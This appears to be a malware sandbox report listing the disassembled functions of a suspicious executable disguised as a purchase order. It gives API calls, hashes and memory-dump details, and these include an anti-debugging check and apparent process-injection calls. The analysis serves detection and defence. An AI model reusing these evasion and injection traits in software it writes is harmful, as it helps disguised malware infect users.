                      • Opcode ID: 11fa4746fecb1d81add8d471baf7dbde71289ce772fa59ea038acc0b73c73b06
                      • Instruction ID: e7362d1b0e038d7db0961996ed644dd4fc861b6bc50d30d515befc1f96505c7b
                      • Opcode Fuzzy Hash: 11fa4746fecb1d81add8d471baf7dbde71289ce772fa59ea038acc0b73c73b06
                      • Instruction Fuzzy Hash: 4971BBB59013419BC700EF6EB9A0794BBE4FB5834A794AEEED00A97362DFB04844CF15
                      Function 00A94010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: EA06
                      • API String ID: 4104443479-3962188686
                      • Opcode ID: 44d320149d0307294f6af2e6fd04a246dbf1b3ed233a86c029fc69d5bd14f6f8
                      • Instruction ID: 8d93ff4b8395c7c38853f50952298fa64ba59129ab21ebffbde3bf1b067127a0
                      • Opcode Fuzzy Hash: 44d320149d0307294f6af2e6fd04a246dbf1b3ed233a86c029fc69d5bd14f6f8
                      • Instruction Fuzzy Hash: 65418C31B081549BDF159B6489A1FBF7FF1DB1D300F384665EA829B283C6258D8287A1
                      Function 00A934C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                      Download Yara Rule
                      Strings
                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00B034AA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                      • API String ID: 1029625771-2684727018
                      • Opcode ID: 88988c6c67d9ea2364ef06a668828fbe414cb80b342b0fb9ddf725317fb49202
                      • Instruction ID: d2acea4acb70ccea95eb2ee28fadd910ee2f8c3b91aa86220c10fd33370dd6a7
                      • Opcode Fuzzy Hash: 88988c6c67d9ea2364ef06a668828fbe414cb80b342b0fb9ddf725317fb49202
                      • Instruction Fuzzy Hash: 80F06872A0020DAECF11EFB0D9519FFB7FCAE10310F548566E81692192EB349B09CB21
                      Function 00AB35E7 Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                      Download Yara Rule
                      APIs
                      • _memmove.LIBCMT ref: 00AB367B
                      • __flush.LIBCMT ref: 00AB369B
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __flush__getptd_noexit_memmove
                      • String ID:
                      • API String ID: 3662107617-0
                      • Opcode ID: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                      • Instruction ID: 8adb749121b1a56387d397d52f579ef00d9ea9f357545473f731e806ff25cf34
                      • Opcode Fuzzy Hash: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                      • Instruction Fuzzy Hash: D44192B2600606BFDF18CFA9C8A55EF77ADAB54360B24852DE815C7252EB70DF818B50
                      Function 00A9BBD9 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                      • Instruction ID: ce3b6c45e4f8ca42ff0c19629eb7a948b4e51617175fdc0ebeccd618a0296d66
                      • Opcode Fuzzy Hash: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                      • Instruction Fuzzy Hash: 5631A2B1710506AFCB04DF69D9D1E69F3E8FF48320754822AE519CB291DB30E820CBA0
                      Function 00A93682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                      Download Yara Rule
                      APIs
                      • IsThemeActive.UXTHEME ref: 00A936E6
                        • Part of subcall function 00AB2025: __lock.LIBCMT ref: 00AB202B
                        • Part of subcall function 00A932DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A932F6
                        • Part of subcall function 00A932DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A9330B
                        • Part of subcall function 00A9374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00A9376D
                        • Part of subcall function 00A9374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00A9377F
                        • Part of subcall function 00A9374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe,00000104,?,00B51120,C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe,00B51124,?,?), ref: 00A937EE
                        • Part of subcall function 00A9374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00A93860
                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A93726
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                      • String ID:
                      • API String ID: 924797094-0
                      • Opcode ID: 744c8218554e077f8c5459b257f0d33bd5687251ef84911d0d23abf22310fe6c
                      • Instruction ID: e36677bea15da1c168510c0db27a7e72214a990a2d0d4cea26150ddc9bd0fe9f
                      • Opcode Fuzzy Hash: 744c8218554e077f8c5459b257f0d33bd5687251ef84911d0d23abf22310fe6c
                      • Instruction Fuzzy Hash: F611AC719083419FC700EF29DA09B4EBBF9FB85710F00895EF444872A1DB709A44CB92
                      Function 00ABF782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • ___lock_fhandle.LIBCMT ref: 00ABF7D9
                      • __close_nolock.LIBCMT ref: 00ABF7F2
                        • Part of subcall function 00AB886A: __getptd_noexit.LIBCMT ref: 00AB886A
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                      • String ID:
                      • API String ID: 1046115767-0
                      • Opcode ID: bad7f9c26a3c33ab126974cc6c0944a532f1e23c1a28197f54066af0d153989b
                      • Instruction ID: a826b853a7ee939cf8f1caeebaf779a10fef3772c101d0c110a53d894eaffb16
                      • Opcode Fuzzy Hash: bad7f9c26a3c33ab126974cc6c0944a532f1e23c1a28197f54066af0d153989b
                      • Instruction Fuzzy Hash: 56117C32815A509FD7117FF89E463D87AAC6F42331F6A02A4E5205B1E3CFB85940C7A1
                      Function 00AB010A Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AB45EC: __FF_MSGBANNER.LIBCMT ref: 00AB4603
                        • Part of subcall function 00AB45EC: __NMSG_WRITE.LIBCMT ref: 00AB460A
                        • Part of subcall function 00AB45EC: RtlAllocateHeap.NTDLL(01360000,00000000,00000001,?,?,?,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB462F
                      • std::exception::exception.LIBCMT ref: 00AB013E
                      • __CxxThrowException@8.LIBCMT ref: 00AB0153
                        • Part of subcall function 00AB7495: RaiseException.KERNEL32(?,?,00A9125D,00B46598,?,?,?,00AB0158,00A9125D,00B46598,?,00000001), ref: 00AB74E6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                      • String ID:
                      • API String ID: 3902256705-0
                      • Opcode ID: 519f70b21b7041b8134b4af1afbefeeae0ec92fc75524f8613b99dfd6313c65d
                      • Instruction ID: 81ab5d4c5f32a8f3e8106f86028af34872e81b4d649c45f0525a30782319111f
                      • Opcode Fuzzy Hash: 519f70b21b7041b8134b4af1afbefeeae0ec92fc75524f8613b99dfd6313c65d
                      • Instruction Fuzzy Hash: E1F0C87510421DA6C719FBACED02EDF7BEC9F04350F504556F90596183DBB08A80A7A5
                      Function 00AB4274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      • __lock_file.LIBCMT ref: 00AB42B9
                        • Part of subcall function 00AB5A9F: __lock.LIBCMT ref: 00AB5AC2
                      • __fclose_nolock.LIBCMT ref: 00AB42C4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                      • String ID:
                      • API String ID: 2800547568-0
                      • Opcode ID: 027a6b00d4adba6d60c4de9df9df228556deb6994a83ce347c0768d63b609c80
                      • Instruction ID: 075acd37466d43119495b0c23004991a69f874f3cd19e1d6434bc75c533fb873
                      • Opcode Fuzzy Hash: 027a6b00d4adba6d60c4de9df9df228556deb6994a83ce347c0768d63b609c80
                      • Instruction Fuzzy Hash: 4CF0E931D017549ADB10BB7589027DE7BECAF85334F218209F824AB1C3CBBC8941AF51
                      Function 013BB235 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateProcessW.KERNEL32(?,00000000), ref: 013BB9F3
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013BBA89
                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 013BBAAB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051465036.00000000013B9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013B9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_13b9000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                      • Instruction ID: aa1fbaad2d43d63bac2dde9d71064c2ec37d0f15a978097d2467e5a12a340400
                      • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                      • Instruction Fuzzy Hash: 2E12BE24E18658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                      Function 00AAF92C Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction ID: a9b5a818cbf73ec010a63d7029733e49233c0247e94bc461045fff11e23793c4
                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction Fuzzy Hash: CB31C670A00106AFD758DF98D480A6AFBB5FF4A350B2486A5E449CB295D731EDC1CBD0
                      Function 00A9BD71 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 88aa2d63378c1f750c56ac4746b34edf58f8b70712c1849dd2e966d4e116ad12
                      • Instruction ID: 62bb2c6bfcc4543eb6c7c78014972d0f4c3571fe76f8448698ee15e55a15002a
                      • Opcode Fuzzy Hash: 88aa2d63378c1f750c56ac4746b34edf58f8b70712c1849dd2e966d4e116ad12
                      • Instruction Fuzzy Hash: 2B210071610608EBDF148F24EC45769BFF8FB25380F2184AEE48AC60A0EF3089D4D721
                      Function 00A9D805 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: dfab3c914ab5a01d594dc6e42d7d2bdcd10fc43f0987cc32999be8bc3fb1e6db
                      • Instruction ID: e7e6aba63dc7b1ee23a6f08af43e1829c20137121d0751de74d8227c533ebdf8
                      • Opcode Fuzzy Hash: dfab3c914ab5a01d594dc6e42d7d2bdcd10fc43f0987cc32999be8bc3fb1e6db
                      • Instruction Fuzzy Hash: B6115175600601DFCB24DF28D581956BBF9FF49350720C46EE48ECB662E732E881CB50
                      Function 00A93F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A93F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00A93F90
                      • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00A934E2,?,00000001), ref: 00A93FCD
                        • Part of subcall function 00A93E78: FreeLibrary.KERNEL32(00000000), ref: 00A93EAB
                        • Part of subcall function 00A94010: _memmove.LIBCMT ref: 00A9405A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Library$Free$Load_memmove
                      • String ID:
                      • API String ID: 3640140200-0
                      • Opcode ID: 7f1209d1ef9f9a3ecda022b7a73e952481d55fed77e36755093c786ad3998099
                      • Instruction ID: 7827fca21c611906f8d43ef7f081d2dfbe47a036ef830d5493e319971b46eaab
                      • Opcode Fuzzy Hash: 7f1209d1ef9f9a3ecda022b7a73e952481d55fed77e36755093c786ad3998099
                      • Instruction Fuzzy Hash: F5119132710219AACF20AB64DE06FAE77F99F54704F208829F942A61C1DF749E459B50
                      Function 00ABBD14 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • ___lock_fhandle.LIBCMT ref: 00ABBD73
                        • Part of subcall function 00AB886A: __getptd_noexit.LIBCMT ref: 00AB886A
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __getptd_noexit$___lock_fhandle
                      • String ID:
                      • API String ID: 1144279405-0
                      • Opcode ID: 73ee693aae27e93877d8af21084ca56ebc4f1d6b6d9edab43a3648bd4f8adc29
                      • Instruction ID: ebbcdabecdfb75c2c72810fdcdc775a6e7f4f6880c2a9bd175c84c93845dd096
                      • Opcode Fuzzy Hash: 73ee693aae27e93877d8af21084ca56ebc4f1d6b6d9edab43a3648bd4f8adc29
                      • Instruction Fuzzy Hash: 29116A728256149FD7126FA8CA463D87B68AF42332F550680E5641B2E3DFFC89408B71
                      Function 00AB373E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                      Download Yara Rule
                      APIs
                      • __lock_file.LIBCMT ref: 00AB377D
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __getptd_noexit__lock_file
                      • String ID:
                      • API String ID: 2597487223-0
                      • Opcode ID: ee8191f1f78280466467df8dd166b9bd3f9192c0623dba28236fbac83e620d44
                      • Instruction ID: e11fde6bdb626cebc58a31b25b7e9b45d8caf73c367a09302d35b4959aacafc6
                      • Opcode Fuzzy Hash: ee8191f1f78280466467df8dd166b9bd3f9192c0623dba28236fbac83e620d44
                      • Instruction Fuzzy Hash: 30F096B2940215EBDF21EF748D067EE77ACAF40350F144514F4149A193DFB98B90DB91
                      Function 00A93E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNEL32(?,?,?,?,?,00A934E2,?,00000001), ref: 00A93E6D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: f19b973d55b7b3d791184e5ed87d6b2a83a142d4f09d87fb37c5042e21731ab0
                      • Instruction ID: f12de245d0a0802fb4a7aca484d0f00151287e70aabe3d12761edf68d8c02baf
                      • Opcode Fuzzy Hash: f19b973d55b7b3d791184e5ed87d6b2a83a142d4f09d87fb37c5042e21731ab0
                      • Instruction Fuzzy Hash: 91F015B6606751DFCF349F64D494852BBF6AF047193248A2EE1D682622C7319944DF00
                      Function 013BC238 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051465036.00000000013B9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013B9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_13b9000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction ID: e1e089ff8783a028dcdbca5aa4177b4e400280b9004c36ea8fdc66ad4f0575ad
                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                      • Instruction Fuzzy Hash: 6BE0BF7494420D9FDB00DFA4D54969D7BB4EF04701F100161FD0592280D63099508A62

                      Non-executed Functions

                      Function 00AFF5D0 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00AFF64E
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AFF6AD
                      • GetWindowLongW.USER32(?,000000F0), ref: 00AFF6EA
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AFF711
                      • SendMessageW.USER32 ref: 00AFF737
                      • _wcsncpy.LIBCMT ref: 00AFF7A3
                      • GetKeyState.USER32(00000011), ref: 00AFF7C4
                      • GetKeyState.USER32(00000009), ref: 00AFF7D1
                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AFF7E7
                      • GetKeyState.USER32(00000010), ref: 00AFF7F1
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AFF820
                      • SendMessageW.USER32 ref: 00AFF843
                      • SendMessageW.USER32(?,00001030,?,00AFDE69), ref: 00AFF940
